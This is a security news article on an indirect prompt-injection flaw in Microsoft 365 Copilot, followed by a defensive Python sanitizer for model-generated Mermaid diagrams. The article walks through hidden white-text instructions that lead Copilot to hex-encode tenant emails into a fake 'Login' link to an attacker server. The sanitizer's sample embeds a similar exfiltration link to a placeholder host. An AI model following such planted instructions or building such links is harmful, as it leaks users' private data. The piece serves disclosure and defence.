A newly discovered flaw in Microsoft 365 Copilot could let attackers trick the AI assistant into grabbing and leaking private tenant data.
Researchers found that by hiding secret instructions inside an Office document, attackers can force Copilot to fetch recent corporate emails, encode them, and package them as a malicious Mermaid diagram.
When a user clicks the diagram, the encoded emails slip out to a server controlled by the attacker.
How the Hidden Payload Works
Mermaid is a popular tool that turns simple text into diagrams like flowcharts and sequence charts.
It also supports CSS styling, which gives attackers room to hide malicious links. In this attack, the attacker crafts an Office file with two hidden pages.
The first page tells Copilot to ignore normal content. The second page embeds instructions using white text on a white background to fetch recent emails, convert them into hex strings, and split them into short lines so the diagram engine won’t break.
When a user asks Copilot to summarize the doctored file, the AI processes the hidden instructions.
Instead of giving a normal summary, Copilot:
- Runs the hidden step to retrieve recent corporate emails from the tenant.
- Transforms the email text into a single hex-encoded string.
- Generates a Mermaid “Login” node styled as a button, embedding the hex data into a hyperlink that points to an attacker’s server.
The diagram code resembles a flowchart:
graph LR
A[Malicious Document] -->|User asks to summarize| B[Indirect Prompt Injection]
B --> C[Fetch & Encode Emails]
C --> D[Generate Fake Login Button]
D -->|User clicks| E[Exfiltrate Data]
When the unsuspecting user clicks the fake button, a hidden iframe briefly appears, sending the encoded data to the attacker’s Burp Collaborator server.
Then Copilot shows a mock Microsoft 365 login screen to trick the user into believing they need to sign in again.
Indirect Prompt Injection Explained
Indirect prompt injection occurs when attackers hide instructions inside the content that AI systems process.
Unlike direct injection, where attackers type commands directly at the model, indirect injection uses benign-looking documents or emails that the AI trusts.
The hidden commands override the AI’s normal behavior, letting attackers steer it toward actions like data theft or code execution.
In this case, the hidden instructions in white text forced Copilot to fetch and encode emails, then embed them into a clickable diagram.
The CSS styling of the Mermaid diagram made it possible to slip malicious links past both the AI and the end user.
After responsible disclosure by security researchers, Microsoft patched Copilot to disable interactive elements like hyperlinks in generated Mermaid diagrams.
This update closes the exfiltration channel by preventing AI-created diagrams from carrying active links.
Microsoft advises all users to update their Copilot integrations immediately and to avoid asking the AI to summarize documents from untrusted sources until they have applied the latest patch.
By removing clickable links in diagrams, Microsoft has cut off a clever but dangerous trick that attackers used to turn innocent-looking diagrams into covert data exfiltration tools.
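The fix described above can be mirrored by anyone who renders model-generated Mermaid in their own application. The following is an added example, not code from Microsoft or the researchers: it drops interactive bindings and URLs from diagram source before rendering and flags diagrams that also carry long hex runs. It assumes links arrive through a Mermaid `click` directive or a raw URL; the function name, threshold, and sample are hypothetical.

```python
import re

# Assumption: a link reaches the rendered diagram either through a Mermaid
# `click` directive or as a raw URL inside a label or style line.
URL_RE = re.compile(r"https?://[^\s\"'<>\]]+", re.IGNORECASE)
CLICK_RE = re.compile(r"^\s*click\s", re.IGNORECASE)
# Runs of 16+ hex digits; 3- and 6-digit CSS colours stay below this.
HEX_RUN_RE = re.compile(r"[0-9a-fA-F]{16,}")
MIN_HEX_TOTAL = 32  # hypothetical threshold, tune on real traffic

def sanitize_mermaid(source: str) -> tuple[str, dict]:
    """Strip active links from model-generated Mermaid; report what was found."""
    links, kept = [], []
    for lineno, line in enumerate(source.splitlines(), 1):
        urls = URL_RE.findall(line)
        is_click = bool(CLICK_RE.match(line))
        if urls or is_click:
            links.append({"line": lineno, "click": is_click, "urls": urls})
        if is_click:
            continue  # drop the interactive binding entirely
        kept.append(URL_RE.sub("[link removed]", line))
    # Summed over the whole source, so a payload split across lines still
    # counts as long as each chunk has 16+ hex digits.
    hex_chars = sum(len(run) for run in HEX_RUN_RE.findall(source))
    report = {
        "links": links,
        "hex_chars": hex_chars,
        "suspicious": bool(links) and hex_chars >= MIN_HEX_TOTAL,
    }
    return "\n".join(kept), report

# Constructed sample, not taken from the research: a "Login" node whose link
# carries hex-encoded text to a placeholder host.
SAMPLE_HEX = "constructed sample mail body, not real data".encode().hex()
SAMPLE = f'''graph LR
    A["Login"]
    click A href "https://collector.example.invalid/c?d={SAMPLE_HEX}"
    style A fill:#0078d4,color:#ffffff
'''

if __name__ == "__main__":
    clean, report = sanitize_mermaid(SAMPLE)
    print(clean)
    print(report["suspicious"], report["hex_chars"])
```

Logging the report alongside the document that triggered the response gives responders a trail back to the file carrying the hidden instructions.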